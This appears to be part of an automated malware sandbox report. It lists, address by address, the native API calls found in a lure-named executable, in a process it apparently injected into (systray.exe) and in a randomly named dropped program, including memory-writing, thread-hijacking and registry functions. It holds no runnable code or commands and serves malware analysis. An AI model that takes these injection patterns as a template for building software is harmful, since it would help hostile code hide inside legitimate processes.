Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAB470 NtOpenThread,4_2_04DAB470
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA460 NtOpenProcess,4_2_04DAA460
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAB410 NtOpenProcessToken,4_2_04DAB410
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA430 NtQueryVirtualMemory,4_2_04DAA430
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA5F0 NtReadVirtualMemory,4_2_04DAA5F0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA5A0 NtWriteVirtualMemory,4_2_04DAA5A0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DABD40 NtSuspendThread,4_2_04DABD40
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA520 NtEnumerateKey,4_2_04DAA520
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA6D0 NtCreateProcessEx,4_2_04DAA6D0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA650 NtQueueApcThread,4_2_04DAA650
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA780 NtOpenDirectoryObject,4_2_04DAA780
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA710 NtQuerySection,4_2_04DAA710
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA700 NtProtectVirtualMemory,4_2_04DAA700
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA720 NtResumeThread,4_2_04DAA720
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAB0B0 NtGetContextThread,4_2_04DAB0B0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA2F0 NtQueryInformationFile,4_2_04DAA2F0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DABA30 NtSetContextThread,4_2_04DABA30
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA220 NtWaitForSingleObject,4_2_04DAA220
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DAA370 NtQueryInformationProcess,4_2_04DAA370
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B36BC0 NtCreateFile,4_2_00B36BC0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B36CF0 NtClose,4_2_00B36CF0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B36C70 NtReadFile,4_2_00B36C70
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B36DA0 NtAllocateVirtualMemory,4_2_00B36DA0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B36CEA NtClose,4_2_00B36CEA
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B36C6A NtReadFile,4_2_00B36C6A
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B36D9C NtAllocateVirtualMemory,4_2_00B36D9C
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A5F0 NtReadVirtualMemory,LdrInitializeThunk,14_2_05C0A5F0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A540 NtDelayExecution,LdrInitializeThunk,14_2_05C0A540
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A560 NtQuerySystemInformation,LdrInitializeThunk,14_2_05C0A560
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A480 NtMapViewOfSection,LdrInitializeThunk,14_2_05C0A480
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A4A0 NtUnmapViewOfSection,LdrInitializeThunk,14_2_05C0A4A0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A410 NtQueryInformationToken,LdrInitializeThunk,14_2_05C0A410
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A750 NtCreateFile,LdrInitializeThunk,14_2_05C0A750
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A700 NtProtectVirtualMemory,LdrInitializeThunk,14_2_05C0A700
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A720 NtResumeThread,LdrInitializeThunk,14_2_05C0A720
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A6A0 NtCreateSection,LdrInitializeThunk,14_2_05C0A6A0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A610 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_05C0A610
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A3E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_05C0A3E0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A360 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_05C0A360
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A2D0 NtClose,LdrInitializeThunk,14_2_05C0A2D0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A240 NtReadFile,LdrInitializeThunk,14_2_05C0A240
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A5A0 NtWriteVirtualMemory,14_2_05C0A5A0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0BD40 NtSuspendThread,14_2_05C0BD40
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A520 NtEnumerateKey,14_2_05C0A520
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0ACE0 NtCreateMutant,14_2_05C0ACE0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A460 NtOpenProcess,14_2_05C0A460
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0B470 NtOpenThread,14_2_05C0B470
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A470 NtSetInformationFile,14_2_05C0A470
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0B410 NtOpenProcessToken,14_2_05C0B410
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A430 NtQueryVirtualMemory,14_2_05C0A430
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A780 NtOpenDirectoryObject,14_2_05C0A780
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A710 NtQuerySection,14_2_05C0A710
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A6D0 NtCreateProcessEx,14_2_05C0A6D0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A650 NtQueueApcThread,14_2_05C0A650
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0B0B0 NtGetContextThread,14_2_05C0B0B0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A800 NtSetValueKey,14_2_05C0A800
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A3D0 NtCreateKey,14_2_05C0A3D0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A350 NtQueryValueKey,14_2_05C0A350
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A370 NtQueryInformationProcess,14_2_05C0A370
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A310 NtEnumerateValueKey,14_2_05C0A310
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A2F0 NtQueryInformationFile,14_2_05C0A2F0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A260 NtWriteFile,14_2_05C0A260
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0A220 NtWaitForSingleObject,14_2_05C0A220
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C0BA30 NtSetContextThread,14_2_05C0BA30
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A560 NtQuerySystemInformation,LdrInitializeThunk,15_2_0578A560
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A540 NtDelayExecution,LdrInitializeThunk,15_2_0578A540
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A5F0 NtReadVirtualMemory,LdrInitializeThunk,15_2_0578A5F0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A410 NtQueryInformationToken,LdrInitializeThunk,15_2_0578A410
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A4A0 NtUnmapViewOfSection,LdrInitializeThunk,15_2_0578A4A0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A480 NtMapViewOfSection,LdrInitializeThunk,15_2_0578A480
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A750 NtCreateFile,LdrInitializeThunk,15_2_0578A750
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A720 NtResumeThread,LdrInitializeThunk,15_2_0578A720
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A700 NtProtectVirtualMemory,LdrInitializeThunk,15_2_0578A700
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A610 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_0578A610
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A6A0 NtCreateSection,LdrInitializeThunk,15_2_0578A6A0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A360 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_0578A360
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A3E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_0578A3E0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A240 NtReadFile,LdrInitializeThunk,15_2_0578A240
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A2D0 NtClose,LdrInitializeThunk,15_2_0578A2D0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578BD40 NtSuspendThread,15_2_0578BD40
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A520 NtEnumerateKey,15_2_0578A520
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A5A0 NtWriteVirtualMemory,15_2_0578A5A0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578B470 NtOpenThread,15_2_0578B470
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A470 NtSetInformationFile,15_2_0578A470
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A460 NtOpenProcess,15_2_0578A460
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A430 NtQueryVirtualMemory,15_2_0578A430
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578B410 NtOpenProcessToken,15_2_0578B410
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578ACE0 NtCreateMutant,15_2_0578ACE0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A710 NtQuerySection,15_2_0578A710
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A780 NtOpenDirectoryObject,15_2_0578A780
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A650 NtQueueApcThread,15_2_0578A650
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A6D0 NtCreateProcessEx,15_2_0578A6D0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A800 NtSetValueKey,15_2_0578A800
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578B0B0 NtGetContextThread,15_2_0578B0B0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A370 NtQueryInformationProcess,15_2_0578A370
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A350 NtQueryValueKey,15_2_0578A350
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A310 NtEnumerateValueKey,15_2_0578A310
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A3D0 NtCreateKey,15_2_0578A3D0
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A260 NtWriteFile,15_2_0578A260
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578BA30 NtSetContextThread,15_2_0578BA30
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A220 NtWaitForSingleObject,15_2_0578A220
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 15_2_0578A2F0 NtQueryInformationFile,15_2_0578A2F0
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_00AB8B800_2_00AB8B80
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_00AB20500_2_00AB2050
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F71DE30_2_05F71DE3
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F8D5D20_2_05F8D5D2
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F7FDDB0_2_05F7FDDB
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F8E5810_2_05F8E581
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F6E58A0_2_05F6E58A
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EC0D400_2_05EC0D40
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F6C53F0_2_05F6C53F
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EE15300_2_05EE1530
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F925190_2_05F92519
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F81D1B0_2_05F81D1B
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F844EF0_2_05F844EF
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F8DCC50_2_05F8DCC5
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F92C9A0_2_05F92C9A
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F91C9F0_2_05F91C9F
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F834900_2_05F83490
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF547E0_2_05EF547E
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F7F42B0_2_05F7F42B
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05ED740C0_2_05ED740C
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EE14100_2_05EE1410
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F91FCE0_2_05F91FCE
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EC67D00_2_05EC67D0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F827820_2_05F82782
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EE57900_2_05EE5790
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F917460_2_05F91746
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F926F80_2_05F926F8
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F83E960_2_05F83E96
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF4E610_2_05EF4E61
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F8CE660_2_05F8CE66
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF5E700_2_05EF5E70
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EE76400_2_05EE7640
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF66110_2_05EF6611
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F919E20_2_05F919E2
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F861DF0_2_05F861DF
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F9D9BE0_2_05F9D9BE
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF61800_2_05EF6180
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF594B0_2_05EF594B
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F199060_2_05F19906
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF71100_2_05EF7110
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F928E80_2_05F928E8
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF48CB0_2_05EF48CB
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F718B60_2_05F718B6
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EDA0800_2_05EDA080
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF10700_2_05EF1070
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF00210_2_05EF0021
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EFE0200_2_05EFE020
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F8D0160_2_05F8D016
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF98100_2_05EF9810
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05ECEBE00_2_05ECEBE0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF63C20_2_05EF63C2
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF4B960_2_05EF4B96
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EEFB400_2_05EEFB40
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F922DD0_2_05F922DD
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EE42B00_2_05EE42B0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F91A990_2_05F91A99
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF4A5B0_2_05EF4A5B
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05EF523D0_2_05EF523D
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F9E2140_2_05F9E214
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exeCode function: 0_2_05F80A020_2_05F80A02
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E244EF4_2_04E244EF
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E2DCC54_2_04E2DCC5
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E234904_2_04E23490
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E32C9A4_2_04E32C9A
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E31C9F4_2_04E31C9F
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D9547E4_2_04D9547E
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D814104_2_04D81410
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E1F42B4_2_04E1F42B
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D7740C4_2_04D7740C
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E11DE34_2_04E11DE3
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E2D5D24_2_04E2D5D2
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E1FDDB4_2_04E1FDDB
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E2E5814_2_04E2E581
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E0E58A4_2_04E0E58A
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D60D404_2_04D60D40
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E0C53F4_2_04E0C53F
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D815304_2_04D81530
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E21D1B4_2_04E21D1B
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E325194_2_04E32519
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E326F84_2_04E326F8
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E23E964_2_04E23E96
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E2CE664_2_04E2CE66
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D876404_2_04D87640
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D95E704_2_04D95E70
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D94E614_2_04D94E61
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D966114_2_04D96611
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D667D04_2_04D667D0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E31FCE4_2_04E31FCE
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D857904_2_04D85790
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E227824_2_04E22782
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E317464_2_04E31746
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E328E84_2_04E328E8
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D948CB4_2_04D948CB
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D7A0804_2_04D7A080
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E118B64_2_04E118B6
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D910704_2_04D91070
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D998104_2_04D99810
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E2D0164_2_04E2D016
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D900214_2_04D90021
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D9E0204_2_04D9E020
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E319E24_2_04E319E2
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E261DF4_2_04E261DF
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D961804_2_04D96180
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E3D9BE4_2_04E3D9BE
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D9594B4_2_04D9594B
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D971104_2_04D97110
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04DB99064_2_04DB9906
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E322DD4_2_04E322DD
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D842B04_2_04D842B0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E31A994_2_04E31A99
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D94A5B4_2_04D94A5B
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E20A024_2_04E20A02
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D9523D4_2_04D9523D
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04E3E2144_2_04E3E214
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D963C24_2_04D963C2
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D6EBE04_2_04D6EBE0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D94B964_2_04D94B96
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D8FB404_2_04D8FB40
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B278F04_2_00B278F0
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B278EB4_2_00B278EB
Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_00B3AAE24_2_00B3AAE2
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C8D5D214_2_05C8D5D2
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C7FDDB14_2_05C7FDDB
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C71DE314_2_05C71DE3
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C8E58114_2_05C8E581
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C6E58A14_2_05C6E58A
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BE153014_2_05BE1530
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C9251914_2_05C92519
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C81D1B14_2_05C81D1B
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C6C53F14_2_05C6C53F
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BC0D4014_2_05BC0D40
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C8DCC514_2_05C8DCC5
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C844EF14_2_05C844EF
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C92C9A14_2_05C92C9A
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C91C9F14_2_05C91C9F
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C8349014_2_05C83490
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BE141014_2_05BE1410
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BD740C14_2_05BD740C
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BF547E14_2_05BF547E
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C7F42B14_2_05C7F42B
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C91FCE14_2_05C91FCE
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05BE579014_2_05BE5790
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exeCode function: 14_2_05C8278214_2_05C82782
